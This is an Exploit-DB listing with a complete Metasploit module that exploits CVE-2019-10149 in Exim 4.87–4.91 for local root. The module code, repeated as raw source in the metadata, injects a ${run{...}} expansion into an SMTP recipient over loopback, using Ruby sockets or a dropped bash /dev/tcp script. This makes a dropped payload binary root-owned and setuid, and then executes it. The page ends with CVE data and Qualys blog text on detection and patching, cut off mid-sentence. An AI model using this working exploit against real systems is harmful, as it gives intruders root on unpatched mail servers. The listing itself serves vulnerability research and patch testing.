Exim 4.87 / 4.91 - Local Privilege Escalation (Metasploit)
2019-08-26T00:00:00
ID EDB-ID:47307 Type exploitdb Reporter Exploit-DB Modified 2019-08-26T00:00:00
Description
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'expect'
class MetasploitModule < Msf::Exploit::Local
  # Local privilege escalation for CVE-2019-10149 (Exim 4.87 - 4.91, see
  # 'References' below). The module opens an SMTP conversation to the Exim
  # instance listening on the compromised host's loopback interface and places
  # an Exim string expansion (${run{...}}) in the RCPT TO local part; the
  # command it carries makes a dropped payload binary root-owned and setuid.
  #
  # Defender notes (grounded in what this module sends): the transaction is
  # visible in Exim's own logs as a loopback SMTP session whose recipient
  # address contains "${run{", followed by a burst of "Received:" header
  # lines. Upgrading to Exim 4.92 or later is the fix.
  Rank = ExcellentRanking

  # NOTE(review): the helpers used below (write_file, chmod, writable?, setuid?,
  # command_exists?, is_root?, nosuid?, register_file_for_cleanup) are expected
  # to come from these mixins - verify against the framework version in use.
  include Msf::Exploit::FileDropper
  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System

  # Module metadata and operator-settable options:
  #   EXIMPORT          - local port Exim listens on (default 25)
  #   ForceExploit      - (advanced) run even if the session is already root
  #   SendExpectTimeout - (advanced) seconds allowed per SMTP send/expect step
  #   WritableDir       - (advanced) directory for the payload and helper script
  # PrependSetuid/PrependSetgid default to true because #exploit refuses to
  # run without both of them.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Exim 4.87 - 4.91 Local Privilege Escalation',
      # Literal contents of the %q{} string are kept exactly as written.
      'Description' => %q{
This module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive).
Improper validation of recipient address in deliver_message()
function in /src/deliver.c may lead to command execution with root privileges
(CVE-2019-10149).
},
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Qualys', # Discovery and PoC (@qualys)
          'Dennis Herrmann', # Working exploit (@dhn)
          'Marco Ivaldi', # Working exploit (@0xdea)
          'Guillaume André' # Metasploit module (@yaumn_)
        ],
      'DisclosureDate' => '2019-06-05',
      'Platform' => [ 'linux' ],
      'Arch' => [ ARCH_X86, ARCH_X64 ],
      'SessionTypes' => [ 'shell', 'meterpreter' ],
      # The version bounds are read back by #check via target[:lower_version]
      # and target[:upper_version] (inclusive on both ends).
      'Targets' =>
        [
          [
            'Exim 4.87 - 4.91',
            lower_version: Gem::Version.new('4.87'),
            upper_version: Gem::Version.new('4.91')
          ]
        ],
      'DefaultOptions' =>
        {
          'PrependSetgid' => true,
          'PrependSetuid' => true
        },
      'References' =>
        [
          [ 'CVE', '2019-10149' ],
          [ 'EDB', '46996' ],
          [ 'URL', 'https://www.openwall.com/lists/oss-security/2019/06/06/1' ]
        ]
    ))

    register_options(
      [
        OptInt.new('EXIMPORT', [ true, 'The port exim is listening to', 25 ])
      ])

    register_advanced_options(
      [
        OptBool.new('ForceExploit', [ false, 'Force exploit even if the current session is root', false ]),
        OptFloat.new('SendExpectTimeout', [ true, 'Timeout per send/expect when communicating with exim', 3.5 ]),
        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
      ])
  end

  # @return [String] the WritableDir option, coerced to a String
  def base_dir
    datastore['WritableDir'].to_s
  end

  # Rewrites +cmd+ as a run of literal "\xHH" byte escapes (single-quoted
  # '\x', so Ruby does not interpret the backslash). Presumably this keeps
  # shell- and SMTP-significant characters out of the recipient address in
  # which the command is later embedded.
  #
  # NOTE: 'H2' * cmd.length unpacks one byte per *character*; for non-ASCII
  # input (more bytes than characters) the tail of the command would be
  # dropped. Callers here only pass ASCII.
  #
  # @param cmd [String] command line to encode
  # @return [String] e.g. "\\x2f\\x62\\x69\\x6e" for "/bin"
  def encode_command(cmd)
    '\x' + cmd.unpack('H2' * cmd.length).join('\x')
  end

  # Meterpreter only: opens a TCP client channel from the session's stdapi
  # socket subsystem to 127.0.0.1:EXIMPORT, i.e. the connection originates on
  # the target itself.
  #
  # @return [Array(Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket, Object)]
  #   the socket subsystem (so the caller can shut it down) and the channel
  # @raise re-raises whatever create_tcp_client_channel raised, after logging
  def open_tcp_connection
    socket_subsystem = Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket.new(client)
    params = Rex::Socket::Parameters.new({
      'PeerHost' => '127.0.0.1',
      'PeerPort' => datastore['EXIMPORT']
    })
    begin
      socket = socket_subsystem.create_tcp_client_channel(params)
    rescue => e
      vprint_error("Couldn't connect to port #{datastore['EXIMPORT']}, "\
                   "are you sure exim is listening on this port? (see EXIMPORT)")
      raise e
    end
    return socket_subsystem, socket
  end

  # Delivers +payload+ (an already encode_command'ed command string) to the
  # local Exim through an SMTP session, then waits 5 seconds for Exim to act.
  #
  # Two transports: meterpreter sessions drive the socket from Ruby with a
  # per-step timeout; plain shell sessions drop and run a bash script that
  # uses /dev/tcp. Both send the same dialogue: HELO, empty MAIL FROM, a
  # RCPT TO whose local part is ${run{payload}}, DATA, a run of "Received:"
  # lines, and the terminating ".".
  #
  # @param payload [String] command to place inside ${run{...}}
  # @return [void]
  def inject_payload(payload)
    if session.type == 'meterpreter'
      # Raises (unhandled here) if the port is not reachable.
      socket_subsystem, socket = open_tcp_connection

      # Ordered line => expected reply pattern. A nil key means "send nothing,
      # just wait for the banner"; a nil value means "send, do not wait".
      tcp_conversation = {
        nil => /220/,
        'helo localhost' => /250/,
        "MAIL FROM:<>" => /250/,
        "RCPT TO:<${run{#{payload}}}@localhost>" => /250/,
        'DATA' => /354/,
        'Received:' => nil,
        '.' => /250/
      }

      begin
        tcp_conversation.each do |line, pattern|
          # Each send/expect pair is bounded by SendExpectTimeout.
          Timeout.timeout(datastore['SendExpectTimeout']) do
            if line
              if line == 'Received:'
                # 31 header lines here versus 30 (seq 1 30) in the bash path
                # below; the intent appears to be exceeding Exim's
                # received_headers_max - confirm against the advisory.
                for i in (1..31)
                  socket.puts("#{line} #{i}\n")
                end
              else
                socket.puts("#{line}\n")
              end
            end
            if pattern
              socket.expect(pattern)
            end
          end
        end
      rescue Rex::ConnectionError => e
        fail_with(Failure::Unreachable, e.message)
      rescue Timeout::Error
        fail_with(Failure::TimeoutExpired, 'SendExpectTimeout maxed out')
      ensure
        # Always close the SMTP session cleanly, even on fail_with.
        socket.puts("QUIT\n")
        socket.close
        socket_subsystem.shutdown
      end
    else
      # Reachability probe: `bash -c 'exec 3<>/dev/tcp/...'` succeeds only if
      # the connect works; "&& echo true" runs in the session shell afterwards.
      # NOTE(review): this path connects to "localhost" while the meterpreter
      # path uses 127.0.0.1 - they differ if localhost resolves to ::1 only.
      unless cmd_exec("/bin/bash -c 'exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}' "\
                      "&& echo true").chomp.to_s == 'true'
        fail_with(Failure::NotFound, "Port #{datastore['EXIMPORT']} is closed")
      end

      # Same SMTP dialogue as above, as a bash script. The %|...| literal's
      # contents (including the absence of indentation) are part of the
      # runtime string and are kept exactly as written. Note that
      # 'Received: $i' is single-quoted, so $i is never expanded and every
      # line reads literally "Received: $i" - only the count matters here.
      bash_script = %|
#!/bin/bash
exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}
read -u 3 && echo $REPLY
echo "helo localhost" >&3
read -u 3 && echo $REPLY
echo "mail from:<>" >&3
read -u 3 && echo $REPLY
echo 'rcpt to:<${run{#{payload}}}@localhost>' >&3
read -u 3 && echo $REPLY
echo "data" >&3
read -u 3 && echo $REPLY
for i in $(seq 1 30); do
echo 'Received: $i' >&3
done
echo "." >&3
read -u 3 && echo $REPLY
echo "quit" >&3
read -u 3 && echo $REPLY
|

      # Random file name in WritableDir; registered so FileDropper removes it.
      @bash_script_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
      write_file(@bash_script_path, bash_script)
      register_file_for_cleanup(@bash_script_path)
      chmod(@bash_script_path)
      cmd_exec("/bin/bash -c \"#{@bash_script_path}\"")
    end

    # Give Exim time to process the message and run the expansion.
    print_status('Payload sent, wait a few seconds...')
    Rex.sleep(5)
  end

  # Aborts the module unless /bin/bash exists on the target (the shell-session
  # paths in #inject_payload and #check depend on bash's /dev/tcp).
  # @return [void]
  def check_for_bash
    unless command_exists?('/bin/bash')
      fail_with(Failure::NotFound, 'bash not found')
    end
  end

  # Cleanup hook: once the payload has called back, delete the setuid binary
  # from the new (root) session, using stdapi for meterpreter and rm -f for a
  # shell.
  # @param session [Msf::Session] the freshly established session
  def on_new_session(session)
    super

    if session.type == 'meterpreter'
      session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')
      session.fs.file.rm(@payload_path)
    else
      session.shell_command_token("rm -f #{@payload_path}")
    end
  end

  # Banner-grab check: reads the first line Exim sends on connect and parses
  # "Exim <version>" out of it.
  #
  # @return [CheckCode] Appears when the version is within the target's
  #   inclusive bounds, Safe when it is outside them or the port is closed,
  #   Unknown when no Exim version could be read from the banner
  def check
    if session.type == 'meterpreter'
      begin
        socket_subsystem, socket = open_tcp_connection
      rescue
        # open_tcp_connection already logged the failure.
        return CheckCode::Safe
      end
      res = socket.gets
      socket.close
      socket_subsystem.shutdown
    else
      check_for_bash
      # Read one banner line via /dev/tcp, or print "false" if connect fails.
      res = cmd_exec("/bin/bash -c 'exec 3</dev/tcp/localhost/#{datastore['EXIMPORT']} && "\
                     "(read -u 3 && echo $REPLY) || echo false'")
      # NOTE(review): exact equality relies on cmd_exec returning the output
      # without a trailing newline - confirm for the session type in use.
      if res == 'false'
        vprint_error("Couldn't connect to port #{datastore['EXIMPORT']}, "\
                     "are you sure exim is listening on this port? (see EXIMPORT)")
        return CheckCode::Safe
      end
    end

    if res =~ /Exim ([0-9\.]+)/i
      version = Gem::Version.new($1)
      vprint_status("Found exim version: #{version}")
      if version >= target[:lower_version] && version <= target[:upper_version]
        return CheckCode::Appears
      else
        return CheckCode::Safe
      end
    end

    CheckCode::Unknown
  end

  # Main flow:
  #   1. refuse to run as root unless ForceExploit is set
  #   2. require WritableDir to be writable and not mounted nosuid (a setuid
  #      binary there would be useless otherwise)
  #   3. require PrependSetuid/PrependSetgid so the payload keeps root
  #   4. drop the payload executable, have Exim chown root + chmod 4755 it,
  #      verify the setuid bit, then run it in the background
  # @return [void]
  def exploit
    if is_root?
      unless datastore['ForceExploit']
        fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
      end
    end

    unless writable?(base_dir)
      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
    end

    if nosuid?(base_dir)
      fail_with(Failure::BadConfig, "#{base_dir} is mounted nosuid")
    end

    unless datastore['PrependSetuid'] && datastore['PrependSetgid']
      fail_with(Failure::BadConfig, 'PrependSetuid and PrependSetgid must both be set to true in order ' \
                                    'to get root privileges.')
    end

    if session.type == 'shell'
      check_for_bash
    end

    # Random file name in WritableDir; registered for cleanup on failure and
    # additionally removed from the new session in #on_new_session.
    @payload_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
    write_file(@payload_path, payload.encoded_exe)
    register_file_for_cleanup(@payload_path)
    inject_payload(encode_command("/bin/sh -c 'chown root #{@payload_path};"\
                                  "chmod 4755 #{@payload_path}'"))

    # If Exim did not run the command the binary is still ours and not setuid.
    unless setuid?(@payload_path)
      fail_with(Failure::Unknown, "Couldn't escalate privileges")
    end

    # Background it so cmd_exec returns promptly; the session arrives via
    # the payload handler.
    cmd_exec("#{@payload_path} & echo ")
  end
end
{"id": "EDB-ID:47307", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Exim 4.87 / 4.91 - Local Privilege Escalation (Metasploit)", "description": "", "published": "2019-08-26T00:00:00", "modified": "2019-08-26T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.exploit-db.com/exploits/47307", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2019-10149"], "lastseen": "2019-08-26T13:36:58", "viewCount": 546, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D6CD45B9-F610-4480-99E7-80A4065DF5FD"]}, {"type": "cve", "idList": ["CVE-2019-10149"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E", "QUALYSBLOG:EE3A76FB5EA09543FF235E8362A83373", "QUALYSBLOG:1B84DE2D33648D7FDD0B08B1CC1F1AD8"]}, {"type": "msrc", "idList": ["MSRC:31C9A6AB6048DC2F0939A862156094A7", "MSRC:388A48CE67D2E58B0FB4372836DA1089"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994514"]}, {"type": "threatpost", "idList": ["THREATPOST:130EDA07603C228BE562B445904A297A", "THREATPOST:97FDAC2A1EE34161937EEA7D58123D3D", "THREATPOST:406129F1455008D4B9A55FF40B09CCAF", "THREATPOST:1E8692DD3729CF2A8B526A85F076513F"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154198", "PACKETSTORM:153312"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1524-1"]}, {"type": "zdt", "idList": ["1337DAY-ID-32848", "1337DAY-ID-32869", "1337DAY-ID-33150"]}, {"type": "nessus", "idList": ["EXIM_4_92.NASL", "OPENSUSE-2019-1524.NASL", "DEBIAN_DSA-4456.NASL", "GENTOO_GLSA-201906-01.NASL", "UBUNTU_USN-4010-1.NASL", "ALA_ALAS-2019-1221.NASL", "FREEBSD_PKG_45BEA6B5885511E98D4197657151F8C2.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:46996", "EDB-ID:46974"]}, {"type": "cisa", "idList": ["CISA:0112C06A4ED522FC96CC36F94A083A95", "CISA:8012376262FFBCAA3DBEE889B5EE4625"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/LOCAL/EXIM4_DELIVER_MESSAGE_PRIV_ESC/", 
"MSF:EXPLOIT/LINUX/LOCAL/EXIM4_DELIVER_MESSAGE_PRIV_ESC"]}, {"type": "canvas", "idList": ["EXIM_EXPANSION_RCE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310852550", "OPENVAS:1361412562310844043", "OPENVAS:1361412562310140090", "OPENVAS:1361412562310704456"]}, {"type": "freebsd", "idList": ["45BEA6B5-8855-11E9-8D41-97657151F8C2"]}, {"type": "amazon", "idList": ["ALAS-2019-1221"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:F3A304F4033DF3E6F81CCD52475053BD"]}, {"type": "ubuntu", "idList": ["USN-4010-1"]}, {"type": "gentoo", "idList": ["GLSA-201906-01"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4456-1:5D64B"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:5F07E65256D3B05FE6074E80F7346498", "EXPLOITPACK:4FFD4258EB9240F56C83A57C965E0913"]}, {"type": "thn", "idList": ["THN:A947D0153E6D676ABBCCAB69CD1E73DB", "THN:66694DD5D9C12B2B7881AB6C960E34DC", "THN:FF07DE65AF5F03EDE8E6AF8F1D180CA1"]}, {"type": "securelist", "idList": ["SECURELIST:91CACDF02C22F17E70A0DC58D036F9DE", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4"]}], "modified": "2019-08-26T13:36:58", "rev": 2}, "score": {"value": 5.9, "vector": "NONE", "modified": "2019-08-26T13:36:58", "rev": 2}, "vulnersScore": 5.9}, "sourceHref": "https://www.exploit-db.com/download/47307", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'expect'\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::FileDropper\r\n include Msf::Post::File\r\n include Msf::Post::Linux::Priv\r\n include Msf::Post::Linux::System\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Exim 4.87 - 4.91 Local Privilege Escalation',\r\n 'Description' => %q{\r\n This module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive).\r\n Improper validation of recipient address in deliver_message()\r\n function in /src/deliver.c may lead to 
command execution with root privileges\r\n (CVE-2019-10149).\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Qualys', # Discovery and PoC (@qualys)\r\n 'Dennis Herrmann', # Working exploit (@dhn)\r\n 'Marco Ivaldi', # Working exploit (@0xdea)\r\n 'Guillaume Andr\u00e9' # Metasploit module (@yaumn_)\r\n ],\r\n 'DisclosureDate' => '2019-06-05',\r\n 'Platform' => [ 'linux' ],\r\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' =>\r\n [\r\n [\r\n 'Exim 4.87 - 4.91',\r\n lower_version: Gem::Version.new('4.87'),\r\n upper_version: Gem::Version.new('4.91')\r\n ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'PrependSetgid' => true,\r\n 'PrependSetuid' => true\r\n },\r\n 'References' =>\r\n [\r\n [ 'CVE', '2019-10149' ],\r\n [ 'EDB', '46996' ],\r\n [ 'URL', 'https://www.openwall.com/lists/oss-security/2019/06/06/1' ]\r\n ]\r\n ))\r\n\r\n register_options(\r\n [\r\n OptInt.new('EXIMPORT', [ true, 'The port exim is listening to', 25 ])\r\n ])\r\n\r\n register_advanced_options(\r\n [\r\n OptBool.new('ForceExploit', [ false, 'Force exploit even if the current session is root', false ]),\r\n OptFloat.new('SendExpectTimeout', [ true, 'Timeout per send/expect when communicating with exim', 3.5 ]),\r\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\r\n ])\r\n end\r\n\r\n def base_dir\r\n datastore['WritableDir'].to_s\r\n end\r\n\r\n def encode_command(cmd)\r\n '\\x' + cmd.unpack('H2' * cmd.length).join('\\x')\r\n end\r\n\r\n def open_tcp_connection\r\n socket_subsystem = Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket.new(client)\r\n params = Rex::Socket::Parameters.new({\r\n 'PeerHost' => '127.0.0.1',\r\n 'PeerPort' => datastore['EXIMPORT']\r\n })\r\n begin\r\n socket = socket_subsystem.create_tcp_client_channel(params)\r\n rescue => e\r\n vprint_error(\"Couldn't connect to port #{datastore['EXIMPORT']}, \"\\\r\n \"are you sure exim is listening on this port? 
(see EXIMPORT)\")\r\n raise e\r\n end\r\n return socket_subsystem, socket\r\n end\r\n\r\n def inject_payload(payload)\r\n if session.type == 'meterpreter'\r\n socket_subsystem, socket = open_tcp_connection\r\n\r\n tcp_conversation = {\r\n nil => /220/,\r\n 'helo localhost' => /250/,\r\n \"MAIL FROM:<>\" => /250/,\r\n \"RCPT TO:<${run{#{payload}}}@localhost>\" => /250/,\r\n 'DATA' => /354/,\r\n 'Received:' => nil,\r\n '.' => /250/\r\n }\r\n\r\n begin\r\n tcp_conversation.each do |line, pattern|\r\n Timeout.timeout(datastore['SendExpectTimeout']) do\r\n if line\r\n if line == 'Received:'\r\n for i in (1..31)\r\n socket.puts(\"#{line} #{i}\\n\")\r\n end\r\n else\r\n socket.puts(\"#{line}\\n\")\r\n end\r\n end\r\n if pattern\r\n socket.expect(pattern)\r\n end\r\n end\r\n end\r\n rescue Rex::ConnectionError => e\r\n fail_with(Failure::Unreachable, e.message)\r\n rescue Timeout::Error\r\n fail_with(Failure::TimeoutExpired, 'SendExpectTimeout maxed out')\r\n ensure\r\n socket.puts(\"QUIT\\n\")\r\n socket.close\r\n socket_subsystem.shutdown\r\n end\r\n else\r\n unless cmd_exec(\"/bin/bash -c 'exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}' \"\\\r\n \"&& echo true\").chomp.to_s == 'true'\r\n fail_with(Failure::NotFound, \"Port #{datastore['EXIMPORT']} is closed\")\r\n end\r\n\r\n bash_script = %|\r\n #!/bin/bash\r\n\r\n exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}\r\n read -u 3 && echo $REPLY\r\n echo \"helo localhost\" >&3\r\n read -u 3 && echo $REPLY\r\n echo \"mail from:<>\" >&3\r\n read -u 3 && echo $REPLY\r\n echo 'rcpt to:<${run{#{payload}}}@localhost>' >&3\r\n read -u 3 && echo $REPLY\r\n echo \"data\" >&3\r\n read -u 3 && echo $REPLY\r\n for i in $(seq 1 30); do\r\n echo 'Received: $i' >&3\r\n done\r\n echo \".\" >&3\r\n read -u 3 && echo $REPLY\r\n echo \"quit\" >&3\r\n read -u 3 && echo $REPLY\r\n |\r\n\r\n @bash_script_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))\r\n write_file(@bash_script_path, bash_script)\r\n 
register_file_for_cleanup(@bash_script_path)\r\n chmod(@bash_script_path)\r\n cmd_exec(\"/bin/bash -c \\\"#{@bash_script_path}\\\"\")\r\n end\r\n\r\n print_status('Payload sent, wait a few seconds...')\r\n Rex.sleep(5)\r\n end\r\n\r\n def check_for_bash\r\n unless command_exists?('/bin/bash')\r\n fail_with(Failure::NotFound, 'bash not found')\r\n end\r\n end\r\n\r\n def on_new_session(session)\r\n super\r\n\r\n if session.type == 'meterpreter'\r\n session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')\r\n session.fs.file.rm(@payload_path)\r\n else\r\n session.shell_command_token(\"rm -f #{@payload_path}\")\r\n end\r\n end\r\n\r\n def check\r\n if session.type == 'meterpreter'\r\n begin\r\n socket_subsystem, socket = open_tcp_connection\r\n rescue\r\n return CheckCode::Safe\r\n end\r\n res = socket.gets\r\n socket.close\r\n socket_subsystem.shutdown\r\n else\r\n check_for_bash\r\n res = cmd_exec(\"/bin/bash -c 'exec 3</dev/tcp/localhost/#{datastore['EXIMPORT']} && \"\\\r\n \"(read -u 3 && echo $REPLY) || echo false'\")\r\n if res == 'false'\r\n vprint_error(\"Couldn't connect to port #{datastore['EXIMPORT']}, \"\\\r\n \"are you sure exim is listening on this port? (see EXIMPORT)\")\r\n return CheckCode::Safe\r\n end\r\n end\r\n\r\n if res =~ /Exim ([0-9\\.]+)/i\r\n version = Gem::Version.new($1)\r\n vprint_status(\"Found exim version: #{version}\")\r\n if version >= target[:lower_version] && version <= target[:upper_version]\r\n return CheckCode::Appears\r\n else\r\n return CheckCode::Safe\r\n end\r\n end\r\n\r\n CheckCode::Unknown\r\n end\r\n\r\n def exploit\r\n if is_root?\r\n unless datastore['ForceExploit']\r\n fail_with(Failure::BadConfig, 'Session already has root privileges. 
Set ForceExploit to override.')\r\n end\r\n end\r\n\r\n unless writable?(base_dir)\r\n fail_with(Failure::BadConfig, \"#{base_dir} is not writable\")\r\n end\r\n\r\n if nosuid?(base_dir)\r\n fail_with(Failure::BadConfig, \"#{base_dir} is mounted nosuid\")\r\n end\r\n\r\n unless datastore['PrependSetuid'] && datastore['PrependSetgid']\r\n fail_with(Failure::BadConfig, 'PrependSetuid and PrependSetgid must both be set to true in order ' \\\r\n 'to get root privileges.')\r\n end\r\n\r\n if session.type == 'shell'\r\n check_for_bash\r\n end\r\n\r\n @payload_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))\r\n write_file(@payload_path, payload.encoded_exe)\r\n register_file_for_cleanup(@payload_path)\r\n inject_payload(encode_command(\"/bin/sh -c 'chown root #{@payload_path};\"\\\r\n \"chmod 4755 #{@payload_path}'\"))\r\n\r\n unless setuid?(@payload_path)\r\n fail_with(Failure::Unknown, \"Couldn't escalate privileges\")\r\n end\r\n\r\n cmd_exec(\"#{@payload_path} & echo \")\r\n end\r\nend", "osvdbidlist": []}
{"attackerkb": [{"lastseen": "2020-11-18T06:42:58", "bulletinFamily": "info", "cvelist": ["CVE-2019-10149"], "description": "Exim unauthenticated RCE with reports that it\u2019s been used by [Sandworm since August 2019](<CVE-2019-10149>)\n\n \n**Recent assessments:** \n \n**ericalexanderorg** at May 28, 2020 4:49pm UTC reported:\n\nUntested POC exists\n\n[https://github.com/MNEMO-CERT/PoC\u2014CVE-2019-10149_Exim/blob/master/PoC_CVE-2019-10149.py](<https://github.com/MNEMO-CERT/PoC--CVE-2019-10149_Exim/blob/master/PoC_CVE-2019-10149.py>)\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 3**gwillcox-r7** at November 04, 2020 4:03pm UTC reported:\n\nUntested POC exists\n\n[https://github.com/MNEMO-CERT/PoC\u2014CVE-2019-10149_Exim/blob/master/PoC_CVE-2019-10149.py](<https://github.com/MNEMO-CERT/PoC--CVE-2019-10149_Exim/blob/master/PoC_CVE-2019-10149.py>)\n", "modified": "2020-05-28T00:00:00", "published": "2020-05-28T00:00:00", "id": "AKB:D6CD45B9-F610-4480-99E7-80A4065DF5FD", "href": "https://attackerkb.com/topics/jDinrhSIJh/cve-2019-10149", "type": "attackerkb", "title": "CVE-2019-10149", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2021-02-02T07:12:45", "description": "A flaw was found in Exim versions 4.87 to 4.91 (inclusive). 
Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to remote command execution.", "edition": 13, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-06-05T14:29:00", "title": "CVE-2019-10149", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-11T20:29:00", "cpe": ["cpe:/a:exim:exim:4.91"], "id": "CVE-2019-10149", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-10149", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:exim:exim:4.91:*:*:*:*:*:*:*"]}], "qualysblog": [{"lastseen": "2019-06-15T00:29:31", "bulletinFamily": "blog", "cvelist": ["CVE-2019-10149"], "description": "Last week, Qualys issued a [security advisory](<https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt>) for a vulnerability we discovered during a code review of Exim. 
This vulnerability can lead to Remote Command Injection, and is currently being [actively attacked](<https://www.helpnetsecurity.com/2019/06/14/exploiting-cve-2019-10149/>) in the wild. This blog will show you how to quickly identify assets that are impacted by this vulnerability.\n\n### The Vulnerability\n\nThis vulnerability exists in all versions of Exim's MTA from version 4.87 to 4.91. Exploitation of the vulnerability only requires a malicious email to be sent to a vulnerable server, and injected commands will typically run as root. There are multiple ways that Exim can be configured, and some of these will allow for faster exploitation, while others may require a week to fully exploit. For technical details on this vulnerability please see our [security advisory](<https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt>).\n\n### Detecting CVE-2019-10149\n\nThe best method for identifying vulnerable hosts is through the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) or via authenticated scanning. Several QIDs have been released for various Linux distros, as well as a generic remote Potential QID that will identify Exim hosts.\n\n### Finding Vulnerable Hosts\n\nThe fastest way to locate vulnerable hosts is though the [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) Live Feed as seen here:\n\n\n\nSimply click on the impacted assets number to see a list of hosts with this vulnerability. For customers without Threat Protection, you can manually search for the CVE in AssetView, by using this search string:\n \n \n vulnerabilities.vulnerability.cveIds:`CVE-2019-10149`\n\nThis will return a list of all impacted hosts. The results can also be grouped by Vulnerability, which will allow you to determine which distro patches are needed. 
To filter out the Potential detections (though these should be evaluated), you can modify the query like this:\n \n \n vulnerabilities:(vulnerability.cveIds:`CVE-2019-10149` and typeDetected:`Confirmed`)\n\n### Remediation\n\nTo remediate this vulnerability, Exim must be updated to version 4.92. Check your Linux OS vendor for updated packages.", "modified": "2019-06-14T22:27:14", "published": "2019-06-14T22:27:14", "id": "QUALYSBLOG:EE3A76FB5EA09543FF235E8362A83373", "href": "https://blog.qualys.com/laws-of-vulnerabilities/2019/06/14/exim-mta-vulnerability-the-return-of-the-wizard-cve-2019-10149", "type": "qualysblog", "title": "Exim MTA Vulnerability (The Return of the WIZard \u2013 CVE-2019-10149)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-05T19:50:44", "bulletinFamily": "blog", "cvelist": ["CVE-2019-10149"], "description": "The Exim MTA vulnerability, initially [reported by Qualys](<https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt>) in May 2019, is currently being exploited in the wild. Recently, the US National Security Agency (NSA) [announced](<https://www.us-cert.gov/ncas/current-activity/2020/05/28/nsa-releases-advisory-sandworm-actors-exploiting-exim>) that Sandworm actors (Russian hacker group) have been actively exploiting the Exim Mail Transfer Agent vulnerability.\n\nQualys released a blog post last year describing how to identify assets that are impacted by this vulnerability in your environment: [Exim MTA Vulnerability (The Return of the WIZard \u2013 